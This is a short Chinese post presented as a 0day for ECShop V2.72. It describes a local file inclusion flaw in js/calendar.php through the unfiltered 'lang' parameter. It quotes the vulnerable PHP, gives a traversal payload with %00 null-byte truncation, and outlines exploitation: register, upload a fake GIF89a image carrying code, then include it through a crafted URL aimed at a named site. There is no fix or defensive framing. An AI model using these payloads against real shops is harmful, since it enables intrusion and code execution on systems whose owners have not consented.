ecshopV2.72 本地文件包含漏洞ODAY

响版本：Ecshop V2.72
官方网站：http://www.ecshop.cn

漏洞类型：文件包含
漏洞描述： 当魔法引号关闭时，magic_quotes_gpc = Off js/calendar.php可包含文件。

代码：
js/calendar.php

$lang = (!empty($_GET[''lang'']))    ? trim($_GET[''lang'']) : ''zh_cn'';//没有过滤，很明显的包含漏洞 by: YMr.LP    if (!file_exists(''../languages/'' . $lang . ''/calendar.php''))   {   $lang = ''zh_cn'';   }    require(dirname(dirname(__FILE__)) . ''/data/config.php'');   header(''Content-type: application/x-javascript; charset='' . EC_CHARSET);    include_once(''../languages/'' . $lang . ''/calendar.php'');//这里包含，需要截断 by: YMr.    测试代码 :

// 需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.（注意后面有个.）by: YMr.LP

 

利用：

注册用户

然后上传GIF89a头的GIF文件欺骗，

然后包含 如：[img]http://www.sitedirsec.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

